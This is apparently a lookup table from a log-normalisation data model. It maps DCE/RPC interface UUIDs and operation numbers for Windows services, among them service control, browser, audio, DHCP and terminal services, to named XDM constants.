367abb81-9844-35f1-ad32-98f038001003:31 XDM_CONST.DCERPC_OPERATION_START_SERVICE_A
367abb81-9844-35f1-ad32-98f038001003:32 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_DISPLAY_NAME_A
367abb81-9844-35f1-ad32-98f038001003:33 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_KEY_NAME_A
367abb81-9844-35f1-ad32-98f038001003:34 XDM_CONST.DCERPC_OPERATION_SC_GET_CURRENT_GROUP_STATE_W
367abb81-9844-35f1-ad32-98f038001003:35 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICE_GROUP_W
367abb81-9844-35f1-ad32-98f038001003:36 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG2_A
367abb81-9844-35f1-ad32-98f038001003:37 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG2_W
367abb81-9844-35f1-ad32-98f038001003:38 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG2_A
367abb81-9844-35f1-ad32-98f038001003:39 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG2_W
367abb81-9844-35f1-ad32-98f038001003:40 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_STATUS_EX
367abb81-9844-35f1-ad32-98f038001003:41 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_EX_A
367abb81-9844-35f1-ad32-98f038001003:42 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_EX_W
367abb81-9844-35f1-ad32-98f038001003:43 XDM_CONST.DCERPC_OPERATION_SC_SEND_TS_MESSAGE
367abb81-9844-35f1-ad32-98f038001003:44 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_WOW64_A
367abb81-9844-35f1-ad32-98f038001003:45 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_WOW64_W
367abb81-9844-35f1-ad32-98f038001003:46 XDM_CONST.DCERPC_OPERATION_SC_QUERY_SERVICE_TAG_INFO
367abb81-9844-35f1-ad32-98f038001003:47 XDM_CONST.DCERPC_OPERATION_NOTIFY_SERVICE_STATUS_CHANGE
367abb81-9844-35f1-ad32-98f038001003:48 XDM_CONST.DCERPC_OPERATION_GET_NOTIFY_RESULT
367abb81-9844-35f1-ad32-98f038001003:49 XDM_CONST.DCERPC_OPERATION_CLOSE_NOTIFY_HANDLE
367abb81-9844-35f1-ad32-98f038001003:50 XDM_CONST.DCERPC_OPERATION_CONTROL_SERVICE_EX_A
367abb81-9844-35f1-ad32-98f038001003:51 XDM_CONST.DCERPC_OPERATION_CONTROL_SERVICE_EX_W
367abb81-9844-35f1-ad32-98f038001003:52 XDM_CONST.DCERPC_OPERATION_SC_SEND_PN_P_MESSAGE
367abb81-9844-35f1-ad32-98f038001003:53 XDM_CONST.DCERPC_OPERATION_SC_VALIDATE_PN_P_SERVICE
367abb81-9844-35f1-ad32-98f038001003:54 XDM_CONST.DCERPC_OPERATION_SC_OPEN_SERVICE_STATUS_HANDLE
6bffd098-a112-3610-9833-012892020162:0 XDM_CONST.DCERPC_OPERATION_BROWSER_SERVER_ENUM
6bffd098-a112-3610-9833-012892020162:1 XDM_CONST.DCERPC_OPERATION_BROWSER_DEBUG_CALL
6bffd098-a112-3610-9833-012892020162:2 XDM_CONST.DCERPC_OPERATION_BROWSER_QUERY_OTHER_DOMAINS
6bffd098-a112-3610-9833-012892020162:3 XDM_CONST.DCERPC_OPERATION_BROWSER_RESET_NETLOGON_STATE
6bffd098-a112-3610-9833-012892020162:4 XDM_CONST.DCERPC_OPERATION_BROWSER_DEBUG_TRACE
6bffd098-a112-3610-9833-012892020162:5 XDM_CONST.DCERPC_OPERATION_BROWSER_QUERY_STATISTICS
6bffd098-a112-3610-9833-012892020162:6 XDM_CONST.DCERPC_OPERATION_BROWSER_RESET_STATISTICS
6bffd098-a112-3610-9833-012892020162:7 XDM_CONST.DCERPC_OPERATION_NETR_BROWSER_STATISTICS_CLEAR
6bffd098-a112-3610-9833-012892020162:8 XDM_CONST.DCERPC_OPERATION_NETR_BROWSER_STATISTICS_GET
6bffd098-a112-3610-9833-012892020162:9 XDM_CONST.DCERPC_OPERATION_BROWSER_SET_NETLOGON_STATE
6bffd098-a112-3610-9833-012892020162:10 XDM_CONST.DCERPC_OPERATION_BROWSER_QUERY_EMULATED_DOMAINS
6bffd098-a112-3610-9833-012892020162:11 XDM_CONST.DCERPC_OPERATION_BROWSER_SERVER_ENUM_EX
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:0 XDM_CONST.DCERPC_OPERATION_GFX_CREATE_ZONE_FACTORIES_LIST
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:1 XDM_CONST.DCERPC_OPERATION_GFX_CREATE_GFX_FACTORIES_LIST
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:2 XDM_CONST.DCERPC_OPERATION_GFX_CREATE_GFX_LIST
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:3 XDM_CONST.DCERPC_OPERATION_GFX_REMOVE_GFX
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:4 XDM_CONST.DCERPC_OPERATION_GFX_ADD_GFX
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:5 XDM_CONST.DCERPC_OPERATION_GFX_MODIFY_GX
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:6 XDM_CONST.DCERPC_OPERATION_GFX_OPEN_GFX
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:7 XDM_CONST.DCERPC_OPERATION_GFX_LOGON
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:8 XDM_CONST.DCERPC_OPERATION_GFX_LOGOFF
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:9 XDM_CONST.DCERPC_OPERATION_WINMM_REGISTER_SESSION_NOTIFICATION_EVENT
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:10 XDM_CONST.DCERPC_OPERATION_WINMM_UNREGISTER_SESSION_NOTIFICATION
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:11 XDM_CONST.DCERPC_OPERATION_WINMM_SESSION_CONNECT_STATE
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:12 XDM_CONST.DCERPC_OPERATION_WDM_DRIVER_OPEN_DRV_REG_KEY
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:13 XDM_CONST.DCERPC_OPERATION_WINMM_ADVISE_PREFERRED_DEVICE_CHANGE
3faf4738-3a21-4307-b46c-fdda9bb8c0d5:14 XDM_CONST.DCERPC_OPERATION_WINMM_GET_PNP_INFO
c386ca3e-9061-4a72-821e-498d83be188f:0 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_CONNECT
c386ca3e-9061-4a72-821e-498d83be188f:1 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_DISCONNECT
c386ca3e-9061-4a72-821e-498d83be188f:2 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_INITIALIZE
c386ca3e-9061-4a72-821e-498d83be188f:3 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_AUDIO_SESSION
c386ca3e-9061-4a72-821e-498d83be188f:4 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_CREATE_STREAM
c386ca3e-9061-4a72-821e-498d83be188f:5 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_DESTROY_STREAM
c386ca3e-9061-4a72-821e-498d83be188f:6 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_STREAM_LATENCY
c386ca3e-9061-4a72-821e-498d83be188f:7 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_MIX_FORMAT
c386ca3e-9061-4a72-821e-498d83be188f:8 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_IS_FORMAT_SUPPORTED
c386ca3e-9061-4a72-821e-498d83be188f:9 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_DEVICE_PERIOD
c386ca3e-9061-4a72-821e-498d83be188f:10 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_MASTER_VOLUME_LEVEL_SCALAR
c386ca3e-9061-4a72-821e-498d83be188f:11 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_PROCESS_ID
c386ca3e-9061-4a72-821e-498d83be188f:12 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_STATE
c386ca3e-9061-4a72-821e-498d83be188f:13 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_LAST_ACTIVATION
c386ca3e-9061-4a72-821e-498d83be188f:14 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_LAST_INACTIVATION
c386ca3e-9061-4a72-821e-498d83be188f:15 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_IS_SYSTEM_SOUNDS_SESSION
c386ca3e-9061-4a72-821e-498d83be188f:16 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_DISPLAY_NAME
c386ca3e-9061-4a72-821e-498d83be188f:17 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_DISPLAY_NAME
c386ca3e-9061-4a72-821e-498d83be188f:18 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_SESSION_CLASS
c386ca3e-9061-4a72-821e-498d83be188f:19 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_SESSION_CLASS
c386ca3e-9061-4a72-821e-498d83be188f:20 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_VOLUME
c386ca3e-9061-4a72-821e-498d83be188f:21 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_VOLUME
c386ca3e-9061-4a72-821e-498d83be188f:22 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_MUTE
c386ca3e-9061-4a72-821e-498d83be188f:23 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_MUTE
c386ca3e-9061-4a72-821e-498d83be188f:24 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_CHANNEL_COUNT
c386ca3e-9061-4a72-821e-498d83be188f:25 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_CHANNEL_VOLUME
c386ca3e-9061-4a72-821e-498d83be188f:26 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_CHANNEL_VOLUME
c386ca3e-9061-4a72-821e-498d83be188f:27 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_ALL_VOLUMES
c386ca3e-9061-4a72-821e-498d83be188f:28 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_ALL_VOLUMES
c386ca3e-9061-4a72-821e-498d83be188f:29 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_DISCONNECT
c386ca3e-9061-4a72-821e-498d83be188f:30 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_MIX_FORMAT
c386ca3e-9061-4a72-821e-498d83be188f:31 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_GET_DEVICE_FORMAT
c386ca3e-9061-4a72-821e-498d83be188f:32 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_SET_DEVICE_FORMAT
c386ca3e-9061-4a72-821e-498d83be188f:33 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_DEVICE_PERIOD
c386ca3e-9061-4a72-821e-498d83be188f:34 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_SET_PROCESSING_PERIOD
c386ca3e-9061-4a72-821e-498d83be188f:35 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_GET_SHARE_MODE
c386ca3e-9061-4a72-821e-498d83be188f:36 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_SET_SHARE_MODE
c386ca3e-9061-4a72-821e-498d83be188f:37 XDM_CONST.DCERPC_OPERATION_GET_AUDIO_SESSION_MANAGER
c386ca3e-9061-4a72-821e-498d83be188f:38 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_DESTROY
c386ca3e-9061-4a72-821e-498d83be188f:39 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_GET_AUDIO_SESSION
c386ca3e-9061-4a72-821e-498d83be188f:40 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_GET_CURRENT_SESSION
c386ca3e-9061-4a72-821e-498d83be188f:41 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_GET_EXISTING_SESSION
c386ca3e-9061-4a72-821e-498d83be188f:42 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_ADD_AUDIO_SESSION_CLIENT_NOTIFICATION
c386ca3e-9061-4a72-821e-498d83be188f:43 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_DELETE_AUDIO_SESSION_CLIENT_NOTIFICATION
c386ca3e-9061-4a72-821e-498d83be188f:44 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_ADD_AUDIO_SESSION_CLIENT_NOTIFICATION
c386ca3e-9061-4a72-821e-498d83be188f:45 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_CONNECT
c386ca3e-9061-4a72-821e-498d83be188f:46 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_DISCONNECT
c386ca3e-9061-4a72-821e-498d83be188f:47 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_CHANNEL_COUNT
c386ca3e-9061-4a72-821e-498d83be188f:48 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_MASTER_VOLUME_LEVEL
c386ca3e-9061-4a72-821e-498d83be188f:49 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_MASTER_VOLUME_LEVEL_SCALAR
c386ca3e-9061-4a72-821e-498d83be188f:50 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_MASTER_VOLUME_LEVEL
c386ca3e-9061-4a72-821e-498d83be188f:51 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_MASTER_VOLUME_LEVEL_SCALAR
c386ca3e-9061-4a72-821e-498d83be188f:52 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_CHANNEL_VOLUME_LEVEL
c386ca3e-9061-4a72-821e-498d83be188f:53 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_CHANNEL_VOLUME_LEVEL_SCALAR
c386ca3e-9061-4a72-821e-498d83be188f:54 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_CHANNEL_VOLUME_LEVEL
c386ca3e-9061-4a72-821e-498d83be188f:55 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_CHANNEL_VOLUME_LEVEL_SCALAR
c386ca3e-9061-4a72-821e-498d83be188f:56 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_MUTE
c386ca3e-9061-4a72-821e-498d83be188f:57 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_DISPLAY_NAME
c386ca3e-9061-4a72-821e-498d83be188f:58 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_ADD_MASTER_VOLUME_NOTIFICATION
c386ca3e-9061-4a72-821e-498d83be188f:59 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_DELETE_MASTER_VOLUME_NOTIFICATION
c386ca3e-9061-4a72-821e-498d83be188f:60 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_AVERAGE_RMS
c386ca3e-9061-4a72-821e-498d83be188f:61 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_CHANNELS_RMS
c386ca3e-9061-4a72-821e-498d83be188f:62 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_PEAK_VALUE
c386ca3e-9061-4a72-821e-498d83be188f:63 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_CHANNELS_PEAK_VALUES
c386ca3e-9061-4a72-821e-498d83be188f:64 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_STEP_INFO
c386ca3e-9061-4a72-821e-498d83be188f:65 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_STEP_UP
c386ca3e-9061-4a72-821e-498d83be188f:66 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_STEP_DOWN
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:0 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_PREFIX
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:1 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RENEW_PREFIX
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:2 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RELEASE_PREFIX
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:3 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:0 XDM_CONST.DCERPC_OPERATION_RPC_SRV_ENABLE_DHCP
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:1 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RENEW_LEASE
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:2 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RENEW_LEASE_BY_BROADCAST
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:3 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RELEASE_LEASE
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:4 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_FALLBACK_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:5 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_FALLBACK_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:6 XDM_CONST.DCERPC_OPERATION_RPC_SRV_FALLBACK_REFRESH_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:7 XDM_CONST.DCERPC_OPERATION_RPC_SRV_STATIC_REFRESH_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:8 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REMOVE_DNS_REGISTRATIONS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:9 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:10 XDM_CONST.DCERPC_OPERATION_RPC_SRV_PERSISTENT_REQUEST_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:11 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REGISTER_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:12 XDM_CONST.DCERPC_OPERATION_RPC_SRV_DE_REGISTER_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:13 XDM_CONST.DCERPC_OPERATION_RPC_SRV_ENUM_INTERFACES
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:14 XDM_CONST.DCERPC_OPERATION_RPC_SRV_QUERY_LEASE_INFO
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:15 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_CLASS_ID
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:16 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_CLASS_ID
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:17 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_CLIENT_ID
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:18 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_CLIENT_ID
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:19 XDM_CONST.DCERPC_OPERATION_RPC_SRV_NOTIFY_MEDIA_RECONNECTED
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:20 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_ORIGINAL_SUBNET_MASK
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:21 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_MSFT_VENDOR_SPECIFIC_OPTIONS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:22 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_CACHED_PARAMS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:23 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REGISTER_CONNECTION_STATE_NOTIFICATION
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:24 XDM_CONST.DCERPC_OPERATION_RPC_SRV_DE_REGISTER_CONNECTION_STATE_NOTIFICATION
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:25 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_NOTIFICATION_STATUS
3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:26 XDM_CONST.DCERPC_OPERATION_RPC_SRV_GET_DHCP_SERVICED_CONNECTIONS
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:0 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_OPEN_SERVER
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:1 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_CLOSE_SERVER
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:2 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_LOAD_POLICY
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:3 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_UNLOAD_POLICY
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:4 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_SET_POLICY
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:5 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_GET_AVAILABLE_POLICY_IDS
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:6 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_GET_POLICY
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:7 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_GET_POLICY_INFORMATION
2f59a331-bf7d-48cb-9ec5-7c090d76e8b8:8 XDM_CONST.DCERPC_OPERATION_RPC_LICENSING_DEACTIVATE_CURRENT_POLICY
5ca4a760-ebb1-11cf-8611-00a0245420ed:0 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_OPEN_SERVER
5ca4a760-ebb1-11cf-8611-00a0245420ed:1 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CLOSE_SERVER
5ca4a760-ebb1-11cf-8611-00a0245420ed:2 XDM_CONST.DCERPC_OPERATION_RPC_ICA_SERVER_PING
5ca4a760-ebb1-11cf-8611-00a0245420ed:3 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE
5ca4a760-ebb1-11cf-8611-00a0245420ed:4 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_RENAME
5ca4a760-ebb1-11cf-8611-00a0245420ed:5 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_INFORMATION
5ca4a760-ebb1-11cf-8611-00a0245420ed:6 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SET_INFORMATION
5ca4a760-ebb1-11cf-8611-00a0245420ed:7 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SEND_MESSAGE
5ca4a760-ebb1-11cf-8611-00a0245420ed:8 XDM_CONST.DCERPC_OPERATION_RPC_LOGON_ID_FROM_WIN_STATION_NAME
5ca4a760-ebb1-11cf-8611-00a0245420ed:9 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NAME_FROM_LOGON_ID
5ca4a760-ebb1-11cf-8611-00a0245420ed:10 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CONNECT
5ca4a760-ebb1-11cf-8611-00a0245420ed:11 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_VIRTUAL_OPEN
5ca4a760-ebb1-11cf-8611-00a0245420ed:12 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_BEEP_OPEN
5ca4a760-ebb1-11cf-8611-00a0245420ed:13 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_DISCONNECT
5ca4a760-ebb1-11cf-8611-00a0245420ed:14 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_RESET
5ca4a760-ebb1-11cf-8611-00a0245420ed:15 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHUTDOWN_SYSTEM
5ca4a760-ebb1-11cf-8611-00a0245420ed:16 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_WAIT_SYSTEM_EVENT
5ca4a760-ebb1-11cf-8611-00a0245420ed:17 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW
5ca4a760-ebb1-11cf-8611-00a0245420ed:18 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW_TARGET_SETUP
5ca4a760-ebb1-11cf-8611-00a0245420ed:19 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW_TARGET
5ca4a760-ebb1-11cf-8611-00a0245420ed:20 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GENERATE_LICENSE
5ca4a760-ebb1-11cf-8611-00a0245420ed:21 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_INSTALL_LICENSE
5ca4a760-ebb1-11cf-8611-00a0245420ed:22 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE_LICENSES
5ca4a760-ebb1-11cf-8611-00a0245420ed:23 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ACTIVATE_LICENSE
5ca4a760-ebb1-11cf-8611-00a0245420ed:24 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_REMOVE_LICENSE
5ca4a760-ebb1-11cf-8611-00a0245420ed:25 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_LICENSE
5ca4a760-ebb1-11cf-8611-00a0245420ed:26 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SET_POOL_COUNT
5ca4a760-ebb1-11cf-8611-00a0245420ed:27 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_UPDATE_REQUIRED
5ca4a760-ebb1-11cf-8611-00a0245420ed:28 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CALLBACK
5ca4a760-ebb1-11cf-8611-00a0245420ed:29 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_APPLICATION_INFO
5ca4a760-ebb1-11cf-8611-00a0245420ed:30 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_READ_REGISTRY
5ca4a760-ebb1-11cf-8611-00a0245420ed:31 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_WAIT_FOR_CONNECT
5ca4a760-ebb1-11cf-8611-00a0245420ed:32 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_LOGON
5ca4a760-ebb1-11cf-8611-00a0245420ed:33 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_LOGOFF
5ca4a760-ebb1-11cf-8611-00a0245420ed:34 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE_PROCESSES
5ca4a760-ebb1-11cf-8611-00a0245420ed:35 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ANNOYANCE_POPUP
5ca4a760-ebb1-11cf-8611-00a0245420ed:36 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_ENUMERATE_PROCESSES
5ca4a760-ebb1-11cf-8611-00a0245420ed:37 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_TERMINATE_PROCESS
5ca4a760-ebb1-11cf-8611-00a0245420ed:38 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_NW_LOGON_SET_ADMIN
5ca4a760-ebb1-11cf-8611-00a0245420ed:39 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_NW_LOGON_QUERY_ADMIN
5ca4a760-ebb1-11cf-8611-00a0245420ed:40 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NTSD_DEBUG
5ca4a760-ebb1-11cf-8611-00a0245420ed:41 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_BREAK_POINT
5ca4a760-ebb1-11cf-8611-00a0245420ed:42 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CHECK_FOR_APPLICATION_NAME
5ca4a760-ebb1-11cf-8611-00a0245420ed:43 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_ALL_PROCESSES
5ca4a760-ebb1-11cf-8611-00a0245420ed:44 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_PROCESS_SID
5ca4a760-ebb1-11cf-8611-00a0245420ed:45 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_TERM_SRV_COUNTERS_VALUE
5ca4a760-ebb1-11cf-8611-00a0245420ed:46 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_RE_INITIALIZE_SECURITY
5ca4a760-ebb1-11cf-8611-00a0245420ed:47 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_BROADCAST_SYSTEM_MESSAGE
5ca4a760-ebb1-11cf-8611-00a0245420ed:48 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SEND_WINDOW_MESSAGE
5ca4a760-ebb1-11cf-8611-00a0245420ed:49 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_NEW_SESSION
